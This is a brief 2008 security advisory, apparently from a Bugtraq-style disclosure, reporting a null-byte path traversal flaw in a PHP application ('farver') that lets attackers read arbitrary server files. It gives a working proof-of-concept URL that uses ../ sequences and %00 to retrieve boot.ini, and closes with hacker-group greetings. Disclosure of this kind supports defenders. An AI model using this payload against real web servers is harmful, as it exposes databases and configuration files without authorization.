#Python Dark Scripts: www.beenuarora.com/work.html
################################################################
#Date Found: 21/08/08
#Severity: High
#Security Risk:Null Byte Files Retrieval
#Explaination:It is possible to view the contents of any file (e.g.
databases, userinformation or configuration files) on the web server (under
the permissionrestrictions of the web server user)
#POC:
http://localhost/farver/index.php?c=/../../../../../../../../boot.ini%00
#For the POC pic visit: www.beenuarora.com/POC.bmp
################################################################
__________________________________________________________________________
____________ |Greetz: D3hydr8,rascal,rsauron,patrick,baltazar,sinner_01 and
rest of teammemebers. |
|__________________________________________________________________________
___________|
References :
http://marc.info/?l=bugtraq&m=121933211712734&w=2
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.